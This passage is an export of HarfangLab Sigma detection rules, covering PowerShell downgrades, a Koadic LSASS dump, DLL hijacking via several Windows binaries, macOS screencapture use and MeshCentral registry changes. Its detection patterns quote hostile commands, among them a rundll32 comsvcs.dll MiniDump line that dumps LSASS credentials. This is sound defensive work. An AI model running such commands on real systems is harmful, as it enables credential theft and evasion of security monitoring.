"content": "title: Downgraded PowerShell Executed\nid: cccb59b8-ff73-4c88-a42b-b858a14aea80\ndescription: |\n Detects PowerShell being executed in a version that does not support the Windows Anti-Malware Scanning Interface (AMSI) or event logging.\n Adversaries can downgrade PowerShell to a version that does not support AMSI or event logging to evade detection.\n It is recommended to examine the parent process as well as the PowerShell commands executed by the detected process to determine wether this action was legitimate.\nreferences:\n - https://gist.github.com/D3Ext/bf57673644ba08e729f65892e0dae6c4#powershell-downgrade\n - https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell/tree/master?tab=readme-ov-file#Using-PowerShell-version-2\n - https://attack.mitre.org/techniques/T1562/010/\ndate: 2025/10/06\nmodified: 2026/02/23\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1562.010\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Script.PowerShell\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: process_creation\ndetection:\n selection:\n OriginalFileName: 'powershell.exe'\n CommandLine|contains:\n - 'powershell.exe -version 2'\n - 'powershell.exe -versio 2'\n - 'powershell.exe -versi 2'\n - 'powershell.exe -vers 2'\n - 'powershell.exe -ver 2'\n - 'powershell.exe -ve 2'\n - 'powershell.exe -v 2'\n - 'powershell -version 2'\n - 'powershell -versio 2'\n - 'powershell -versi 2'\n - 'powershell -vers 2'\n - 'powershell -ver 2'\n - 'powershell -ve 2'\n - 'powershell -v 2'\n\n exclusion_scripts:\n CommandLine|contains:\n - 'NonInteractive'\n - '.ps1'\n\n exclusion_jetbrains:\n Ancestors|contains:\n - '?:\\Program Files\\JetBrains\\IntelliJ IDEA *\\bin\\idea64.exe'\n - '?:\\Users\\\\*\\AppData\\Local\\JetBrains\\IntelliJ IDEA *\\bin\\idea64.exe'\n\n exclusion_jadx:\n Ancestors|contains:\n - '\\jadx-*\\jre\\bin\\javaw.exe|'\n - '\\Jadx Gui\\jadx-gui-*.exe|'\n\n exclusion_zabix:\n Ancestors|contains: '|?:\\Program Files\\zabbix_agent\\'\n\n exclusion_imagej:\n ParentImage|endswith: '\\Fiji.app\\ImageJ-win64.exe'\n\n exclusion_eclipse:\n ParentImage: '?:\\Program Files\\Eclipse Adoptium\\jdk-*-hotspot\\bin\\java.exe'\n\n exclusion_fiji:\n ParentImage|endswith: '\\fiji-windows-x64.exe'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "cccb59b8-ff73-4c88-a42b-b858a14aea80",
"rule_name": "Downgraded PowerShell Executed",
"rule_description": "Detects PowerShell being executed in a version that does not support the Windows Anti-Malware Scanning Interface (AMSI) or event logging.\nAdversaries can downgrade PowerShell to a version that does not support AMSI or event logging to evade detection.\nIt is recommended to examine the parent process as well as the PowerShell commands executed by the detected process to determine wether this action was legitimate.\n",
"rule_creation_date": "2025-10-06",
"rule_modified_date": "2026-02-23",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1562.010"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "cce237f3-db0e-4f5e-90da-54d4d93e8f20",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.091151Z",
"creation_date": "2026-03-23T11:45:34.091154Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.091158Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/offsecginger/koadic",
"https://attack.mitre.org/techniques/T1003/001/",
"https://attack.mitre.org/software/S0250/"
],
"name": "t1003_001_koadic_lsass_dump.yml",
"content": "title: LSASS Dumped via Koadic\nid: cce237f3-db0e-4f5e-90da-54d4d93e8f20\ndescription: |\n Detects an attemps to dump the LSASS (Local Security Authority Subsystem Service) process memory via the Koadic HackTool.\n Adversaries may attempt to access credential material stored in the process memory of the Local Security Authority Subsystem Service (LSASS).\n After a user logs on, the system generates and stores a variety of credential materials in LSASS process memory.\n These credential materials can be harvested by an administrative user or SYSTEM and used to conduct lateral movement.\n It is recommended to analyze the process and user session responsible for this execution to look for malicious content or actions.\nreferences:\n - https://github.com/offsecginger/koadic\n - https://attack.mitre.org/techniques/T1003/001/\n - https://attack.mitre.org/software/S0250/\ndate: 2021/02/18\nmodified: 2025/01/30\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1003.001\n - attack.t1078\n - attack.s0250\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.HackTool.Koadic\n - classification.Windows.Behavior.LSASSAccess\n - classification.Windows.Behavior.PrivilegeEscalation\n - classification.Windows.Behavior.CredentialAccess\nlogsource:\n category: process_creation\n product: windows\ndetection:\n # C:\\Windows\\System32\\rundll32.exe C:\\Windows\\System32\\comsvcs.dll, MiniDump 672 %TEMP%\\1107b58e-498d-85a2-a778-c5ed82bc09fa.bin full\n selection_1:\n - Image|endswith: '\\rundll32.exe'\n - OriginalFileName: 'RUNDLL32.EXE'\n\n selection_2:\n CommandLine|contains|all:\n - '?:\\Windows\\system32\\comsvcs.dll, '\n - 'MiniDump '\n - '\\\\????????-????-????-????-????????????.bin '\n - 'full'\n\n condition: all of selection_*\nlevel: high\n# level: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "cce237f3-db0e-4f5e-90da-54d4d93e8f20",
"rule_name": "LSASS Dumped via Koadic",
"rule_description": "Detects an attemps to dump the LSASS (Local Security Authority Subsystem Service) process memory via the Koadic HackTool.\nAdversaries may attempt to access credential material stored in the process memory of the Local Security Authority Subsystem Service (LSASS).\nAfter a user logs on, the system generates and stores a variety of credential materials in LSASS process memory.\nThese credential materials can be harvested by an administrative user or SYSTEM and used to conduct lateral movement.\nIt is recommended to analyze the process and user session responsible for this execution to look for malicious content or actions.\n",
"rule_creation_date": "2021-02-18",
"rule_modified_date": "2025-01-30",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access"
],
"rule_technique_tags": [
"attack.t1003.001",
"attack.t1078"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "cd208e59-071b-4df4-8703-7a3498fce4b9",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.589278Z",
"creation_date": "2026-03-23T11:45:34.589284Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.589296Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.trendmicro.com/en_us/research/23/h/earth-estries-targets-government-tech-for-cyberespionage.html",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_jps.yml",
"content": "title: DLL Hijacking via jps.exe\nid: cd208e59-071b-4df4-8703-7a3498fce4b9\ndescription: |\n Detects potential Windows DLL Hijacking via jps.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.trendmicro.com/en_us/research/23/h/earth-estries-targets-government-tech-for-cyberespionage.html\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2023/09/05\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'jps.exe'\n ImageLoaded|endswith: '\\jli.dll'\n\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Program Files\\Oracle'\n - '?:\\Program Files (x86)\\Oracle'\n - '?:\\Program Files\\Common Files\\Oracle\\Java\\'\n - '?:\\Program Files (x86)\\Common Files\\Oracle\\Java\\'\n - '?:\\Program Files\\Java'\n - '?:\\Program Files (x86)\\Java'\n - '?:\\Program Files\\AdoptOpenJDK\\jdk-*\\bin\\'\n - '?:\\Program Files (x86)\\AdoptOpenJDK\\jdk-*\\bin\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Program Files\\Oracle'\n - '?:\\Program Files (x86)\\Oracle'\n - '?:\\Program Files\\Common Files\\Oracle\\Java\\'\n - '?:\\Program Files (x86)\\Common Files\\Oracle\\Java\\'\n - '?:\\Program Files\\Java'\n - '?:\\Program Files (x86)\\Java'\n - '?:\\Program Files\\AdoptOpenJDK\\jdk-*\\bin\\'\n - '?:\\Program Files (x86)\\AdoptOpenJDK\\jdk-*\\bin\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature:\n - 'Oracle America, Inc.'\n - 'Eclipse.org Foundation, Inc.'\n - 'Azul Systems, Inc.' # '?:\\Program Files (x86)\\Siemens\\kgw\\jre\\bin\\jps.exe'\n - 'SAP SE' # \\SAP BusinessObjects\\SAP BusinessObjects Enterprise XI 4.0\\win64_x64\\sapjvm\\bin\\jps.exe\n - 'London Jamocha Community CIC' # AdoptOpenJDK\n - 'Microsoft Corporation'\n - 'Amazon.com Services LLC'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "cd208e59-071b-4df4-8703-7a3498fce4b9",
"rule_name": "DLL Hijacking via jps.exe",
"rule_description": "Detects potential Windows DLL Hijacking via jps.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2023-09-05",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "cd2380a2-e760-4c6f-aa15-66b3c694a085",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.098825Z",
"creation_date": "2026-03-23T11:45:34.098827Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.098831Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_fsavailux.yml",
"content": "title: DLL Hijacking via fsavailux.exe\nid: cd2380a2-e760-4c6f-aa15-66b3c694a085\ndescription: |\n Detects potential Windows DLL Hijacking via fsavailux.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'fsavailux.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\DEVOBJ.dll'\n - '\\ifsutil.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "cd2380a2-e760-4c6f-aa15-66b3c694a085",
"rule_name": "DLL Hijacking via fsavailux.exe",
"rule_description": "Detects potential Windows DLL Hijacking via fsavailux.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "cd448b91-b77f-4dd8-abf4-22ce6fa3141b",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:35.295442Z",
"creation_date": "2026-03-23T11:45:35.295446Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:35.295452Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md",
"https://www.loobins.io/binaries/screencapture/",
"https://attack.mitre.org/techniques/T1113/"
],
"name": "t1113_screencapture.yml",
"content": "title: Screen Captured via Screencapture\nid: cd448b91-b77f-4dd8-abf4-22ce6fa3141b\ndescription: |\n Detects the execution of screencapture.\n Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation.\n This alert can be used to correlate activity in an undergoing operation.\n It is recommended to check for other malicious actions by the process launching Screencapture.\nreferences:\n - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md\n - https://www.loobins.io/binaries/screencapture/\n - https://attack.mitre.org/techniques/T1113/\ndate: 2022/07/21\nmodified: 2026/02/11\nauthor: HarfangLab\ntags:\n - attack.collection\n - attack.t1113\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.LOLBin.Screencapture\n - classification.macOS.Behavior.Collection\nlogsource:\n category: process_creation\n product: macos\ndetection:\n selection:\n Image: '/usr/sbin/screencapture'\n ParentImage|contains: '?'\n\n exclusion_image:\n # System UI spawning it for capture via keyboard shortcuts\n - ParentImage:\n - '/System/Library/CoreServices/SystemUIServer.app/Contents/MacOS/SystemUIServer'\n - '/System/Library/CoreServices/loginwindow.app/Contents/MacOS/loginwindow'\n - '/System/Applications/QuickTime Player.app/Contents/XPCServices/com.apple.quicktimeplayer.SharedPrefsVendor.xpc/Contents/MacOS/com.apple.quicktimeplayer.SharedPrefsVendor'\n - '/Applications/iCapturer.app/Contents/MacOS/iCapturer'\n - '/Applications/Shottr.app/Contents/MacOS/Shottr'\n - '/Library/Application Support/Logitech.localized/LogiOptionsPlus/logioptionsplus_agent.app/Contents/MacOS/logioptionsplus_agent'\n - '/Applications/Logi Options.app/Contents/Support/LogiMgrDaemon.app/Contents/MacOS/LogiMgrDaemon'\n - '/Applications/Setapp/CleanShot X.app/Contents/MacOS/CleanShot X Setapp'\n - '/Applications/CleanShot X.app/Contents/MacOS/CleanShot X'\n - '/Applications/TextSniper.app/Contents/MacOS/TextSniper'\n - '/Applications/Adobe Acrobat DC/Adobe Acrobat.app/Contents/MacOS/AdobeAcrobat'\n - '/Applications/TRex.app/Contents/MacOS/TRex'\n - '/Applications/Zappy.app/Contents/MacOS/Zappy'\n - GrandparentImage:\n - '/Applications/Raycast.app/Contents/MacOS/Raycast'\n - '/Applications/Gyazo.app/Contents/MacOS/Gyazo'\n\n exclusion_jamf:\n ParentCommandLine|startswith: '/bin/sh /library/application support/jamf/tmp/'\n\n condition: selection and not 1 of exclusion_*\nlevel: medium\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "cd448b91-b77f-4dd8-abf4-22ce6fa3141b",
"rule_name": "Screen Captured via Screencapture",
"rule_description": "Detects the execution of screencapture.\nAdversaries may attempt to take screen captures of the desktop to gather information over the course of an operation.\nThis alert can be used to correlate activity in an undergoing operation.\nIt is recommended to check for other malicious actions by the process launching Screencapture.\n",
"rule_creation_date": "2022-07-21",
"rule_modified_date": "2026-02-11",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.collection"
],
"rule_technique_tags": [
"attack.t1113"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "cd572f3d-b60f-49de-a256-8d14da21832a",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.073809Z",
"creation_date": "2026-03-23T11:45:34.073811Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.073816Z",
"rule_level": "medium",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://twitter.com/malmoeb/status/1558861977379868672",
"https://meshcentral.com/info/",
"https://attack.mitre.org/techniques/T1112/",
"https://attack.mitre.org/techniques/T1219/002/"
],
"name": "t1112_meshcentral_server_url_registry_configuration.yml",
"content": "title: MeshCentral Server URL Configured in Registry\nid: cd572f3d-b60f-49de-a256-8d14da21832a\ndescription: |\n Detects the creation or modification of a MeshCentral registry server URL configuration.\n MeshCentral is a remote host control tool that can be used maliciously as a Remote Access Tool (RAT).\n Attackers can change this URL to make the MeshCentral agent point to a malicious server controlled by the attacker.\n It is recommended to investigate any actions taken by MeshCentral and to determine if this RMM tool is expected in your environment.\n If this RMM software is common in your environment, it is recommended to disable this rule.\nreferences:\n - https://twitter.com/malmoeb/status/1558861977379868672\n - https://meshcentral.com/info/\n - https://attack.mitre.org/techniques/T1112/\n - https://attack.mitre.org/techniques/T1219/002/\ndate: 2022/08/23\nmodified: 2025/06/27\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1112\n - attack.command_and_control\n - attack.t1219.002\n - classification.Windows.Source.Registry\n - classification.Windows.RMM.MeshCentral\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.CommandAndControl\n - classification.Windows.Behavior.InitialAccess\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType:\n - 'CreateKey'\n - 'SetValue'\n TargetObject: 'HKLM\\SOFTWARE\\\\*\\MeshServerUrl'\n\n filter_local:\n Details: 'local'\n\n condition: selection and not 1 of filter_*\nlevel: medium\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "cd572f3d-b60f-49de-a256-8d14da21832a",
"rule_name": "MeshCentral Server URL Configured in Registry",
"rule_description": "Detects the creation or modification of a MeshCentral registry server URL configuration.\nMeshCentral is a remote host control tool that can be used maliciously as a Remote Access Tool (RAT).\nAttackers can change this URL to make the MeshCentral agent point to a malicious server controlled by the attacker.\nIt is recommended to investigate any actions taken by MeshCentral and to determine if this RMM tool is expected in your environment.\nIf this RMM software is common in your environment, it is recommended to disable this rule.\n",
"rule_creation_date": "2022-08-23",
"rule_modified_date": "2025-06-27",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control",
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1112",
"attack.t1219.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "cdc1f23a-588d-47a8-8fb4-ec10e44ac623",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.076336Z",
"creation_date": "2026-03-23T11:45:34.076338Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.076342Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_sdclt.yml",
"content": "title: DLL Hijacking via sdclt.exe\nid: cdc1f23a-588d-47a8-8fb4-ec10e44ac623\ndescription: |\n Detects potential Windows DLL Hijacking via sdclt.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'sdclt.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\bcd.dll'\n - '\\Cabinet.dll'\n - '\\CLDAPI.dll'\n - '\\CRYPTBASE.DLL'\n - '\\edputil.dll'\n - '\\FLTLIB.DLL'\n - '\\PROPSYS.dll'\n - '\\ReAgent.dll'\n - '\\SPP.dll'\n - '\\SspiCli.dll'\n - '\\UxTheme.dll'\n - '\\VSSAPI.DLL'\n - '\\VssTrace.DLL'\n - '\\wer.dll'\n - '\\WTSAPI32.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "cdc1f23a-588d-47a8-8fb4-ec10e44ac623",
"rule_name": "DLL Hijacking via sdclt.exe",
"rule_description": "Detects potential Windows DLL Hijacking via sdclt.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "cdc56022-c828-4e2a-a235-31810f322716",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.610786Z",
"creation_date": "2026-03-23T11:45:34.610789Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.610797Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1216/"
],
"name": "t1112_comspec_environment_variable_modification.yml",
